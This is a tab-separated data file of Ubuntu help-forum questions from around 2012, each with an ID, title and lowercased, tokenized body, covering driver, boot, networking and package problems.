147475	are there statistics or time series of open bugs in ubuntu ?	i would like to know how the number of bugs in ubuntu ( open , closed , critical , etc ) has evolved with time . it 's a sort of scientific curiosity i have , but it would also give me a feeling how the community has changed over time , how it has coped with the challenges ( i think of unity in particular ) and what 's its status now . has anyone collected these data over the years ? if yes , are they publicly available ? i know this information can be gathered from launchpad itself and actually i found a website that had data from mid 2008 to early 2009 . i found ubuntu live stats , which shows live messages related to ubuntu , but does not aggregate bug statistics . finally there are some stats on the ubuntu weekly newsletter but they only show diffs of bugs closed during the last week .
147478	ubuntu 12.04 menu bar , nautilus , terminal , and gtk themes not working after installation of gimp 2.8	i installed gimp2.8 from this ppa : ppa : otto-kesselgulasch/gimp after that , my system began having problems . this is my thought process in trying to fix what 's happened and the order in which it happened : i noticed the menu bar at the top changed from an opaque black to perfectly clear and the titles of applications and the hidden buttons reacted slowly . no big deal , restarted to see if it fixed it . it did n't , in fact , when the logon screen came up , the password field was grey and boxy like a default windows 98 theme ( that 's the best i can describe it ) as were all the option buttons for gtk programs . i open terminal to try and reinstall gtk , but the terminal is just a black screen with no ability to input commands . i go to a tty and i reinstalled gtk3 and gtk2 ( i have both on my system . i do n't think they 're in conflict , they had n't been before hand ) . i restarted . nothing doing . log in , nautilus is n't placing icons on my desktop . i click the launcher . it flashes , but no window opens . try to open by alt+f2 , nothing . i purge ubuntu-desktop , restart , reinstall ubuntu-desktop . nothing . i have no clue what to do at this point so i 'm asking for any help diagnosing the problem and fixing it .
147482	can not find winemenubuilder.exe when trying to run starcraft 2	recently i 've installed starcraft 2 via playonlinux . the installation was absolutly no problem , everything was fine . but if i want to start the game now , it crashes . if i start it on the terminal i get following error : optirun /usr/share/playonlinux/playonlinux -- run `` starcraft ii wings of liberty '' [ pol_wine_setversionenv ] message : setting wine version path : 1.3.27 , amd64 [ pol_wine_setversionenv ] message : `` /home/gernot/.playonlinux//wine/linux-amd64/1.3.27 '' exists [ pol_wine ] message : running wine-1.3.27 starcraft ii.exe wine : can not find l '' c : \\windows\\system32\\winemenubuilder.exe '' rm : can not remove »*“ : ca n't find directory or file . has anybody an idea what to do ?
147484	help with plymouth script please ! : )	i am attempting to work around this problem : http : //ubuntuforums.org/showthread.php ? t=1997417 on the hypothesis that the problem is a race condition between the boot sequence and '/ ' and my raid0 disks being available [ i do n't know that it is , but would like to see if that the case . ] i read this : https : //wiki.ubuntu.com/plymouth , and have : * played with plymouth-x11 [ very nice ] * installed plymouth-theme-script i would like to do something like this in my boot process , so plymouth waits for the user 's input before continuing : code : show the splash screen sudo plymouth show-splash stop the graphical progress indicator sudo plymouth pause-progress display a message sudo plymouth message -- text= '' pausing boot - press 'c ' or space bar to continue '' wait for the user to type either 'c ' , 'c ' or space ( no return required ) sudo plymouth watch-keystroke -- keys= '' cc `` -- command= '' tee /tmp/c_key_pressed '' change the on-screen message sudo plymouth message -- text= '' resuming boot '' resume the graphical progress indicator sudo plymouth unpause-progress but i do n't really know how to proceed safely . i 'm an idoit , so would appreciate an idiot-proof guide thanks in advance
147491	how can i map the apple magic mouse two-finger swipe to a web browser 's back and forward functions ?	the apple magic mouse appears to work with ubuntu so far , but only a couple multitouch functions seem to work . with the trackpad , there are lots of other functions with utouch . what i 'd really like to do is map two-finger swipes to back/forward in a browser .
147500	ubuntu hangs at the '_ ' prompt for 15 ' when booting . do i need another driver for my intel g31/g33 integrated graphics ?	i have an asrock which uses intel g31 graphics . ubuntu says my graphics chipset is g33 . should i look for another driver or are they from the same family ? i am also having problems booting and that purple screen stuck so for this i asked this question . i have partially fixed the purple screen stuck by enabling ( uncommenting ) this line in grub : grub_terminal=console but ubuntu still hangs at start up for about 15 minutes with a black screen and only the '_ ' prompt . here is a link for an overview of my asrock g31m-s
147503	win7 no longer available after installing 12.04	i have installed ubuntu 12.04 but my windows 7 partition seems to have been lost . it is in sda2 . can anyone help me how to get this windows 7 partition back without having to reinstall windows 7 ? disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xd45cd45c device boot start end blocks id system /dev/sda1 2048 61433855 30715904 83 linux /dev/sda2 * 61433856 122873855 30720000 7 hpfs/ntfs/exfat /dev/sda3 122873856 976769023 426947584 7 hpfs/ntfs/exfat disk /dev/sdb : 203.9 gb , 203928109056 bytes 255 heads , 63 sectors/track , 24792 cylinders , total 398297088 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x03ee03ee device boot start end blocks id system /dev/sdb1 * 63 20482874 10241406 c w95 fat32 ( lba ) /dev/sdb2 20482875 40965749 10241437+ 1c hidden w95 fat32 ( lba ) /dev/sdb3 40965750 398283479 178658865 f w95 ext 'd ( lba ) /dev/sdb5 40965813 76694309 17864248+ 7 hpfs/ntfs/exfat /dev/sdb6 76694373 108856439 16081033+ 7 hpfs/ntfs/exfat /dev/sdb7 108856503 398283479 144713488+ 7 hpfs/ntfs/exfat disk /dev/sdc : 1000.2 gb , 1000204886016 bytes 240 heads , 63 sectors/track , 129201 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000001 device boot start end blocks id system /dev/sdc1 * 63 20480543 10240240+ 82 linux swap / solaris /dev/sdc2 20480605 1953519119 966519257+ f w95 ext 'd ( lba ) /dev/sdc5 20480607 1953519119 966519256+ 7 hpfs/ntfs/exfat
147504	oracle java runtime doens't appear	i had installed originally oracle jdk 7 update 4 , with update-alternatives installation instruction and the jdk became manual mode ( 3 ) . openjdk 7 in auto mode ( o ) . when i will run/install .jar file oracle java runtime doens't appear . how should i do to fix it ? thank you
147508	why do webpages take longer to load in ubuntu 12.04 than windows 7	for example , when i click on a facebook picture , the picture remains pixelated for about 30 seconds , then starts to clear up . or when i watch youtube videos , i ca n't watch them on hd without running into buffer issues . windows 7 is just much snappier . it might be an issue with the graphics card . dualbooting windows 7 64bit & ubuntu 12.04 64 bit specs : cpu : intel® core™ i7-2630qm cpu @ 2.00ghz × 8 ram : 8gb ddr3 hdd : 50 gb to ubuntu & remaining 1.5 tb to windows the interesting part : graphics card : on system settings in ubuntu : intel® sandybridge mobile graphics card : what it should be : radeon™ hd 7690m xt switchable graphics with 1024mb gddr5 and up to 5093mb total graphics memory
147510	ubuntu 12.04 problem with e160 huawei - ca n't detect the device and freezing system	i have just installed 12.04 and plugged in e160 and nothing happened - modem does n't mount . i have found this solution : ubuntu does not mount some huawei devices due to bugs , problems etc . see if these work : 1st option : connect the usb modem . after 10 seconds , type this in a terminal window : lsusb the output will be like this : bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 004 : id 12d1:140b huawei technologies co. , ltd . bus 004 device 002 : id 413c:3016 dell computer corp. optical 5-button wheel mouse bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 005 : id 0b97:7762 o2 micro , inc. oz776 smartcard reader bus 002 device 004 : id 413c:8103 dell computer corp. wireless 350 bluetooth bus 002 device 003 : id 0b97:7761 o2 micro , inc. oz776 1.1 hub bus 002 device 002 : id 413c : a005 dell computer corp. internal 2.0 hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub the device is a huawei modem , so let 's look at the output . the relevant entry is : bus 004 device 004 : id 12d1:140b huawei technologies co. , ltd hence , you must type : sudo modprobe usbserial vendor=0x12d1 product=0x140b 2nd option download usb-modeswitch and usb-modeswitch-data packages from packages.ubuntu.com . install them through the command : sudo dpkg -i usb-modeswitch*.deb 3rd option try a combination of both . but with no result . the modem is still not detected . i 've tried to add a new connection but the system ca n't see my device in setup dialogue . also i have noticed that when i open eg . terminal and try to type sth , the system freezes for a while.. thanks for help !
147516	can xterm do all the things terminal can do ?	is xterm able to do all of the things the regular terminal can do ?
147526	problem with executing dssp ( secondary structure assignment )	i followed a previous post to install dssp on ubuntu how to install dssp ( secondary structure assignments ) under 12.04 ? after the installation i tried to execute dssp which was in /usr/local/bin/dssp but it gave me the following error bash : /usr/local/bin/dssp : can not execute binary file also i tried to analyse some trajectory files from a simulation using the code do_dssp -s md.tpr -f traj.xtc but it also failed giving me the error below reading file md.tpr , version 4.5.5 ( single precision ) reading file md.tpr , version 4.5.5 ( single precision ) segmentation fault ( core dumped ) please post me a solution for this problem . thank you !
147536	user accounts not listed in system settings user accounts	i 'm running 12.04 on ppc ( imac g5 ) - but have a problem with creating/editing user accounts with the system preferences user accounts tool . all updates have been downloaded and installed . when i run the tool my account appears under the other accounts line and i do not see any other accounts - i can unlock and add an account , though this does not appear in the list . however the accounts are created in /etc/passwd . lightdm only displays the last user account created , and after login by command line and enabling the account/setting a password it is possible to login to lightdm as this user . i have added the old gnome users.admin package which does allow me to see all users on the system , but accounts still do not show up in lightdm . lightdm.conf and users.conf are set correctly , with minimum uid set to 1000 . however i understand that these should be ignored with requests handled by accounts-daemon . the accountsservice appears to be started/running - though i am not sure how or where to debug this . i am not using any prescribed service account names - makes no difference if users are administrators or standard accounts . i have searched the forums and found only one unanswered post that matches - so at least not totally alone ! if any one can assist or point out the error of my ways it 'd be much appreciated .
147537	is there any program similar to wireframesketcher that is available and free for ubuntu ?	i 'm developing a mobile application and such a program would be useful for me . i found wireframesketcher on ubuntu software center , but it doens't seem free since i have to fill payment details .
147539	computer wo n't wake from suspend	i have ubuntu 12.04 on my dual screen desktop setup and its been working great . even in 11.10 my computer would n't wake from suspend . its been bugging me and now i would like to do something about it . here is my lspci -- > http : //pastebin.ubuntu.com/1027728/ still an amateur ubuntu user , so let me know of any more information i can provide . thanks for your time .
147547	how to get sound in a separate x server in ubuntu 11.04 or later ?	i configured my ubuntu system so that i 'm able to start any application in a separate x server . running games or for example xbmc in a separate x server has some major advantages . the problem however , is that when you switch to the second x server ( ctrl+alt+f8 ) , you do n't hear any sound . strangely , when switching back to the desktop ( ctrl+alt+f7 ) you can suddenly hear the sound from the second x server . this means that the sound is working , but you just ca n't hear it while you 're in the second x server . in older versions of ubuntu ( e.g . ubuntu 10.10 ) , there is a command ( ck-launch-session ) which you could run in the second x server and the sound would work . unfortunately , this command no longer has that effect in ubuntu 11.04 and later . this is the command i would use to launch xbmc in a separate x server : xinit /usr/bin/ck-launch-session /usr/bin/xbmc -- :1 how can i enable sound when i 'm in a second x server in ubuntu 11.04 or later ? related bug report : 366404
147554	what software can display raw bitmaps on linux ?	i have a raw file but i do n't know the pixel format or the width of the image . i need a tool that can quickly display the data and allow me to try different formats easily . an example of such a tool for windows would be 7yuv . what software exists for this task on linux ? note : this has nothing to do with digital camera raws , which is frustrating my attempts to use google to answer this question .
147555	over-current condition on port 7 or 8	i am having a problem with my usb ports . it shows over-current conditions on ports 7 and 8 . i have heard that this is caused by a damaged usb port , and since it is detecting it on two ports it seems that i have two that are broken . i do indeed have two that do not work , so that is not the issue . what i would like to do is disable whatever program is running over-current condition checks . tty 's are unusable at this point . every few second a new over-current condition occurs . here is the output of dmesg : http : //pastebin.com/cufkrgue is there an easy way to disable these checks or damage the ports to a point where it will no longer check ? fixing them is not important or an option .
147560	how to get the procedural interface back ?	setting up a new machine , i just discovered the procedural interface to sqlite3 seems to be gone : php fatal error : call to undefined function sqlite3_open ( ) is there any way to get that back again ? i tried google now for a couple of hours , but found no suitable solution so far . if possible , i do n't want to rewrite a bunch of code which worked fine until now ( changing it may break it ; ) -- so any hints as to how to restore that functionality is highly welcome !
147566	about output of vga_switcher	when igd and dis both exist in my pc , and i want to disable dis , so i create a service to switch on and off the dis.it works.finally , i decide to add the service command into /etc/rc.local so that dis will be powered off automatically.unfortunately , it fails.there 's only one command added by myself in the file /etc/rc.local , so i can affirm failure is caused by that added command . before , i directly added the command `` echo off > /sys/kernel/debug ... '' into /etc/rc.local , and when i restarted , the system startup fails.so i thought maybe when the command is executed , the dis has n't been powered on or ready for work.so conflict occurs ! it 's just my prediction.then i added one line command `` sleep 1s '' before the `` echo off ... '' , it works nearly everytime when i start or restart pc , while fails sometimes . the output result of `` cat /sys/kernel/debug ... '' is as following : 0 : igd : + : pwr:0000:00:02.0 1 : dis : : pwr:0000:01:00.0 i want know 0000:00:02.0 means what ? time of first power on ? if it was really time , i can set the command `` sleep 2s '' to wait for dis powered on then `` echo off > ... '' thanks for your advice !
147568	how do i get a list of all of the available dbus properties ?	how do i get a list of all of the available dbus properties for example org.freedesktop.dbus.glib.const ? especially to control window managers , like xfwm . and how would i receive the global menu in python-dbus ? like if i started firefox how could i grab it 's global menu data and display it , just like unity 's global menubar ?
147569	skipping video and audio with ps3mediaserver	i 'm using the latest ps3mediaserver build right from the repos suggested in the ubuntu wiki . i 'm streaming multiple movies from my server ( ubuntu 10.04 lts ) to my ps3 over wireless . sometimes , during some movies , the audio and the video will begin skipping . this can last anywhere between 5 and 30 seconds before it goes back to normal . i have a four core i5 processor and 8gb of ddr3 ram so i do n't think my computer is having a hard time keeping up with the transcoding . so this leads me to believe it 's either sub-optimal transcoding options from within ps3ms or my network ca n't handle the heat . other than the out-of-box configuration , is there any way i can tweak the settings for the application to use my resources more efficiently ?
147575	not able to resolve localhost , but 127.0.0.1	i am able to visit 127.0.0.1 . when visiting localhost , it is not able to resolve . here is /etc/hosts 127.0.0.1 localhost # suppose to list all folder + files under /var/www , when visit localhost . 127.0.0.1 mymachine # aegir 127.0.0.1 languages.local # drupal 127.0.0.1 languages.localhost # drupal -- the following lines are desirable for ipv6 capable hosts : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters
147576	can not install nvidia driver	i recently installed ubuntu 12.04 on my desktop . i have three monitors , and after installing , ubuntu only detected one at 1080p . i downloaded the driver from the nvidia website , but when i stop lightdm and try to run the driver , it gives me an error message : error : unable to find the kernel source tree for the currently running kernel . please make sure you have installed the kernel source files for your kernel and that they are properly configured ; on red hat linux systems , for example , be sure you have the kernel-source or kernel-devel rpm installed . if you know the correct kernel source files are installed , you may specify the kernel source path with the -- kernel-source-path command line option . i tried instead to install the driver via the terminal , with the x ppa . the installation seemed to work , but when i rebooted , my display was at 640x480 resolution , with no other options for resolution . the nvidia x server settings program is there now , but when i run it , it simply tells me that i do n't seem to be using their driver , and that i should run nvidia-xconfig as root . doing so does n't help , i simply get the same issue again . i checked the file at /etc/x11/xorg.conf , and it 's an nvidia file ( has nvidia in the header ) . does anyone know something else i can try ? edit : forgot to mention , i tried installing drivers via the additional drivers gui utility , there were two options , one of them marked post-release updates i tried both of them , in both cases it tried to download and install for a while , then said that there was an error , and that a description could be found at /var/log/jockey.log . both logs were over 700 lines .
147577	new swap partition : help to recognize ?	somehow i loaded 12.04 onto my netbook with no swap partition and i 've tried to make a new one . it 's on a separate partition from the boot partition and i have n't found a way to have it recognized yet . i do n't understand the code i 've read online and hope there 's a program with a gui that can help me with this . if not , can anyone explain to me how i can have a swapspace on this netbook
147580	how to see/change screen refresh rate or monitor frequency ?	my eyes hurt so i thought i should check the screen refresh rate ( monitor frequency ) , but i could n't find it . where is it ? ( in ubuntu 12 )
147582	why does my 12.04 alternate cd boot to a blank screen with flashing cursor ?	i can not install ubuntu 12.04 . i burned ubuntu-12.04-alternate-i386.iso to a cd put the burned cd in my computer and reboot , from the cd the screen is blackďźa cursor flashing at the upper left corner did i do something wrong , or can the iso file be the problem ? how to install ubuntu alternate version through a cd ?
147585	what is conky , it 's uses , and how is it implemented ?	i 'd like to know what conky is . how to install it , any maintenance that 's needed . does it work with a specific desktop environment like unity ? can it work with gnome classic ? details would be helpful . the more detailed and less confusing , the better . thank you .
147587	creating a bootable usb recovery drive to be used by someone who is n't computer savvy	i am looking for a way to prepare an image of an ubuntu machine which would be bootable and installable in the easiest way possible . i 'm actually preparing an ubuntu machine for someone living far , and not computer savvy . if he ever has troubles with his installation , he could just put a usb drive in , boot the machine and everything would be resetted for him . i know there are many methods of creating/loading an image of a drive , but the ones i 've found so far have complicated menus with several options to choose from , etc . ideally , perhaps only asking a yes/no question such as `` would you like to reinstall ? '' would be great . does such a tool exist ? thank you in advance !
147590	e17 enlightenment on precise	i have been trying to add enlightenment off and on for over a week now with no luck . i 've added the ppa i find everywhere , yet no luck . every time i try to add i get this : e17 : depends : libecore-evas-svn-03 but it is not going to be installed depends : libecore-imf-svn-03 but it is not going to be installed depends : libecore-input-svn-03 but it is not going to be installed depends : libecore-x-svn-03 but it is not going to be installed depends : libedbus-svn-03 but it is not going to be installed depends : libedje-svn-03 but it is not going to be installed depends : libeet1 but it is not going to be installed depends : libembryo0 but it is not going to be installed depends : libevas-svn-03 but it is not going to be installed depends : libevas-svn-03-engine-software-x11 depends : libedje-bin but it is not going to be installed what in the world am i doing wrong or why ca n't i find these files to get it to work ?
147591	how to make new tab open a blank page in firefox ?	today ubuntu software center asked me to update things as usual , and i accepted . but now when i open a new tab in firefox , it shows 9 'mini pages ' taken from the history of visited pages . how can i remove that ? does it have something to do with the 'ubuntu firefox modifications ' addon ?
147596	clementine player problem ubuntu 11.10	i recently installed clementine on my ubuntu 11.10 box . it was fine at first use . but when i used it this morning , all my playlist were there but it is not playing a song . it 's like it keeps looking for the file forever . i did not move the files anywhere . same thing happened with rythmnbox . help , please ?
147607	unable to login to ubuntu	i am new to ubuntu . i installed ubuntu 12.04 on my pc which is way old along with windows xp . after installation i got a message `` run ubuntu in low graphics '' i clicked yes and then i was asked for user name and password . but i keep getting the same screen over and over . to summarize my ubuntu installation is hung at the login screen .
147609	trying to turn an old computer into a server . where do i start ?	my old computer is a mac powerbook g4 that i am considering turning into an ubuntu server for my house of eight to share movies and music and whatever . i 've never even thought about doing this kind of stuff before so i do n't even know where to start . can someone point me in the right direction ? my concerns : most of my house mates have macs . will there be compatibility issues ? can i make it a wireless network ? my old powerbook g4 might not have the balls . money thanks !
147612	how do i install psychonauts from the recently released humble bundle v ?	i have looked everywhere for `` how to '' but i ca n't find anything . i have ubuntu 12.04 . how do i install psychonauts from the recently released humble indie bundle v ?
147618	how do i get ctrl+alt+f* virtual terminals to work in ubuntu 12.04 ?	i know that the ctrl+alt+f* shortcuts go to virtual terminals . this worked fine up through 11.10 . but in 12.04 , all i get is a blank screen when using a ctrl+alt+f* shortcut ; i can still go back to my x session , though , by pressing ctrl+alt+f7 . what is malfunctioning ?
147624	after upgrade to ubuntu 12.04 from 11.10 screen hangs quite often	i have recently upgraded from 11.10 to 12.04 , i am experiencing a lot of problems , the screen hangs quite a few times the cursor is moving but nothing seems to happen all what is possible is a forced shutdown . also some of the 11.10 themes are not applying correctly eg : orta oron ..etc please help me out on this , or how can i upgrade it back to 11.10 ? ? ?
147627	authentication failed during install	i just download ubuntu one 3.0.1 for windows and got the authentication failed during installerror . but i can login by http . and when i try to reset my pass client it said sorry we did not recognize the email address .
147628	why was mysql-cluster removed from 12.04 and how can i install it ?	i was hoping to get a mysql cluster up and running on 12.04 , but for some reason , the package is marked deleted , and there is no alternative . i also trying searching for the ndb_mgm command , and there are no suggested packages . did it get yanked for a licensing reason ? compatibility ? is there any way to run a cluster on precise short of building from sources ? does that even work ?
147631	i deleted the `` /etc/passwd '' file and can not log in	i was trying to change my username and also my home directory ( /home/username ) and my system started to crash . i deleted the passwd file but i had a backup named passwd_bkp . i tried to rename this passwd_bkp as passwd and it did not work . no commands were being executed ... i was in a terminal window . i restarted my system and now i can not log in . grub gives two options : linux and recovery mode . i tried to open a sessions as root but it says the filesystem is corrupted . i can not access my files . did i lose all my files ?
147633	ubuntu server read-only filesystem issue	we are running a virtual machine server with multiple virtual machines with ubuntu server edition 12.04 and every so often ( usually after updates via webmin it seems ) , the hard-drive turns into read-only filesystem . only two of the virtual machines get affected by this problem ( that i noticed so far ) . what could be causing this issue ? what could we try to fix this problem ? has anyone else had this problem before ? if so , what did you do to fix it ? if i use aptitude instead of webmin , it will not turn into into a read-only filesystem . though this could be a coincidence . could it be a webmin issue ? update 1 looks like this is not an update/webmin issue at all . how i know this is because one of the virtual servers is a git server and it turned into a read-only filesystem out of the blue today . with this new info provided to you , what should i try ? update 2 so , we are going to try to install esxi 5 on our vmware . i will keep you guys up to date once i play around a while on it to see if it fixes the issue once and for all . i first have to wait for our it manager to install esxi 5 . update 3 before trying update 2 , it turns out that the vm was not local but hosted on another machine so we moved the vm to the local machine of the virtual machine server instead of another machine . we will see if that is causing the issue . we are thinking it could be a network issue . update 4 looks like the issue has n't happened in a while ever since we moved the virtual machine to the local vm server . before the virtual machine file was being hosted on another machine . so that could be the problem . so , the new driver might fixed that issue . but , for the time being , we will leave it on the local machine and it should be working . i will let you know if this issue occurs again . thanks .
147634	dell xps 13 hangs up if attach an external monitor	i have an dell xps 13 ultrabook with ubuntu 12.04. its works pretty well , but if i attach my apple cinema display with the mini display port then hangs the notebook up . its totally randomly . power attached or not , freshly restarted or not , monday or friday . i cant see any pattern for the problem . the x log says nothing . only the last line looks very suspicious : [ 35.539 ] ( ii ) intel ( 0 ) : printing ddc gathered modelines : [ 35.539 ] ( ii ) intel ( 0 ) : modeline `` 1366x768 '' x0.0 71.01 1366 1414 1446 1498 768 769 773 790 +hsync -vsync ( 47.4 khz ) [ 35.539 ] ( ii ) intel ( 0 ) : modeline `` 1366x768 '' x0.0 47.34 1366 1414 1446 1498 768 769 773 790 +hsync -vsync ( 31.6 khz ) [ 85.997 ] ( ii ) intel ( 0 ) : edid vendor `` cmn '' , prod id 4920 [ 85.998 ] ( ii ) intel ( 0 ) : printing ddc gathered modelines : [ 85.998 ] ( ii ) intel ( 0 ) : modeline `` 1366x768 '' x0.0 71.01 1366 1414 1446 1498 768 769 773 790 +hsync -vsync ( 47.4 khz ) [ 85.998 ] ( ii ) intel ( 0 ) : modeline `` 1366x768 '' x0.0 47.34 1366 1414 1446 1498 768 769 773 790 +hsync -vsync ( 31.6 khz ) [ 86.469 ] ( ii ) intel ( 0 ) : allocated new frame buffer 1920x1968 stride 7680 , tiled [ 86.592 ] bug : triggered 'if ( ! dev- > valuator || dev- > valuator- > numaxes < 2 ) ' bug : ../../dix/getevents.c:850 in scale_to_desktop ( ) [ 86.592 ] backtrace : [ 86.593 ] 0 : /usr/bin/x ( xorg_backtrace+0x26 ) [ 0x7f3f3e231866 ] [ 86.593 ] 1 : /usr/bin/x ( 0x7f3f3e0a9000+0x621fe ) [ 0x7f3f3e10b1fe ] [ 86.594 ] 2 : /u %
147638	i can not save php.ini in ubuntu 12.04	i want to change the upload_max_filesize = 2m to 50m , then i started edit on php.ini , but when try to save it , it displays error message below could not create a backup file while saving /etc/php5/apache2/php.ini gedit could not back up the old copy of the file before saving the new one . you can ignore this warning and save the file anyway , but if an error occurs while saving , you could lose the old copy of the file . save anyway ?
147645	count duplicated words in a text file	i have a 20 mb file with text and ids . i need a grep or something to count and show any duplicated ids .
147647	how to edit makefile ?	i want to add -std=c99 flag to make command but i have no idea how to do it . where is related file located ? @ andrejs cainikovs but i have not found related file or files yet .
147650	ubuntu server 12.04 , wifi problems	when i installed ubuntu server 12.04 , i selected the ethernet adapter because i will use that most often ; however , i would like to use wifi sometimes as well . this is how far i 've gotten with this problem . lspci 02:00.0 network controller : intel corporation pro/wireless 5100 agn [ shiloh ] network connection iwconfig wlan0 ieee a/b/g/n bssid=off/any mode=managed access point=not-associated tx-power=off retry long limit:7 rts thr : off fragment thr : off power management : off i tried to do iwconfig wlan0 up but that does n't work either . the error message said something along the lines of rfkill but i 'm not connected to the internet to download that particular program . any help here would be great
147651	nvidia drivers do n't work with mainline kernel	i want to try some of the new features in the btrfs filesystem , and to do that i need to use a newer kernel than is included in ubuntu 12.04 . to do that , i have installed linux-headers-3.4.0-030400_3.4.0-030400.201205210521_all.deb , linux-headers-3.4.0-030400-generic_3.4.0-030400.201205210521_amd64.deb , and linux-image-3.4.0-030400-generic_3.4.0-030400.201205210521_amd64.deb from the mainline kernel download here . however , on rebooting into the 3.4 kernel , my desktop is stuck at a very low resolution and i can not increase it to the full . this did happen when i first installed , but a simple install of the nvidia-current package got everything working nicely with my gtx570 card . there were appear to be some dkms errors when i installed the kernel , and they indicated i should look at /var/lib/dkms/nvidia-current/295.40/build/make.log : josh @ sirius : ~/downloads $ sudo dpkg -i linux-*.deb selecting previously unselected package linux-headers-3.4.0-030400 . ( reading database ... 309400 files and directories currently installed . ) unpacking linux-headers-3.4.0-030400 ( from linux-headers-3.4.0-030400_3.4.0-030400.201205210521_all.deb ) ... selecting previously unselected package linux-headers-3.4.0-030400-generic . unpacking linux-headers-3.4.0-030400-generic ( from linux-headers-3.4.0-030400-generic_3.4.0-030400.201205210521_amd64.deb ) ... selecting previously unselected package linux-image-3.4.0-030400-generic . unpacking linux-image-3.4.0-030400-generic ( from linux-image-3.4.0-030400-generic_3.4.0-030400.201205210521_amd64.deb ) ... done . setting up linux-headers-3.4.0-030400 ( 3.4.0-030400.201205210521 ) ... setting up linux-headers-3.4.0-030400-generic ( 3.4.0-030400.201205210521 ) ... examining /etc/kernel/header_postinst.d . run-parts : executing /etc/kernel/header_postinst.d/dkms 3.4.0-030400-generic /boot/vmlinuz-3.4.0-030400-generic error ( dkms apport ) : kernel package linux-headers-3.4.0-030400-generic is not supported error ! bad return status for module build on kernel : 3.4.0-030400-generic ( x86_64 ) consult /var/lib/dkms/nvidia-current/295.40/build/make.log for more information . setting up linux-image-3.4.0-030400-generic ( 3.4.0-030400.201205210521 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/dkms 3.4.0-030400-generic /boot/vmlinuz-3.4.0-030400-generic error ( dkms apport ) : kernel package linux-headers-3.4.0-030400-generic is not supported error ! bad return status for module build on kernel : 3.4.0-030400-generic ( x86_64 ) consult /var/lib/dkms/nvidia-current/295.40/build/make.log for more information . run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.4.0-030400-generic /boot/vmlinuz-3.4.0-030400-generic update-initramfs : generating /boot/initrd.img-3.4.0-030400-generic run-parts : executing /etc/kernel/postinst.d/pm-utils 3.4.0-030400-generic /boot/vmlinuz-3.4.0-030400-generic run-parts : executing /etc/kernel/postinst.d/update-notifier 3.4.0-030400-generic /boot/vmlinuz-3.4.0-030400-generic run-parts : executing /etc/kernel/postinst.d/zz-update-grub 3.4.0-030400-generic /boot/vmlinuz-3.4.0-030400-generic generating grub.cfg ... found linux image : /boot/vmlinuz-3.4.0-030400-generic found initrd image : /boot/initrd.img-3.4.0-030400-generic found linux image : /boot/vmlinuz-3.2.0-24-generic found initrd image : /boot/initrd.img-3.2.0-24-generic found memtest86+ image : /memtest86+.bin found ubuntu 12.04 lts ( 12.04 ) on /dev/sda1 found windows 7 ( loader ) on /dev/sda2 found windows 7 ( loader ) on /dev/sda3 done /var/lib/dkms/nvidia-current/295.40/build/make.log : dkms make.log for nvidia-current-295.40 for kernel 3.4.0-030400-generic ( x86_64 ) thu jun 7 00:58:39 bst 2012 nvidia : calling kbuild ... test -e include/generated/autoconf.h -a -e include/config/auto.conf || ( \ echo ; \ echo `` error : kernel configuration is invalid . `` ; \ echo `` include/generated/autoconf.h or include/config/auto.conf are missing . `` ; \ echo `` run 'make oldconfig & & make prepare ' on kernel src to fix it . `` ; \ echo ; \ /bin/false ) mkdir -p /var/lib/dkms/nvidia-current/295.40/build/.tmp_versions ; rm -f /var/lib/dkms/nvidia-current/295.40/build/.tmp_versions/* make -f scripts/makefile.build obj=/var/lib/dkms/nvidia-current/295.40/build cc -wp , -md , /var/lib/dkms/nvidia-current/295.40/build/.nv.o.d -nostdinc -isystem /usr/lib/gcc/x86_64-linux-gnu/4.6/include -i/usr/src/linux-headers-3.4.0-030400-generic/arch/x86/include -iarch/x86/include/generated -iinclude -include /usr/src/linux-headers-3.4.0-030400-generic/include/linux/kconfig.h -d__kernel__ -wall -wundef -wstrict-prototypes -wno-trigraphs -fno-strict-aliasing -fno-common -werror-implicit-function-declaration -wno-format-security -fno-delete-null-pointer-checks -o2 -m64 -mtune=generic -mno-red-zone -mcmodel=kernel -funit-at-a-time -maccumulate-outgoing-args -fstack-protector -dconfig_as_cfi=1 -dconfig_as_cfi_signal_frame=1 -dconfig_as_cfi_sections=1 -dconfig_as_fxsaveq=1 -pipe -wno-sign-compare -fno-asynchronous-unwind-tables -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -wframe-larger-than=1024 -wno-unused-but-set-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -pg -wdeclaration-after-statement -wno-pointer-sign -fno-strict-overflow -fconserve-stack -dcc_have_asm_goto -i/var/lib/dkms/nvidia-current/295.40/build -wall -md -wsign-compare -wno-cast-qual -wno-error -d__kernel__ -dmodule -dnvrm -dnv_version_string=\ '' 295.40\ '' -wno-unused-function -wuninitialized -mno-red-zone -mcmodel=kernel -udebug -u_debug -dndebug -dmodule -d '' kbuild_str ( s ) = # s '' -d '' kbuild_basename=kbuild_str ( nv ) '' -d '' kbuild_modname=kbuild_str ( nvidia ) '' -c -o /var/lib/dkms/nvidia-current/295.40/build/.tmp_nv.o /var/lib/dkms/nvidia-current/295.40/build/nv.c in file included from include/linux/kernel.h:19:0 , from include/linux/sched.h:55 , from include/linux/utsname.h:35 , from /var/lib/dkms/nvidia-current/295.40/build/nv-linux.h:38 , from /var/lib/dkms/nvidia-current/295.40/build/nv.c:13 : include/linux/bitops.h : in function 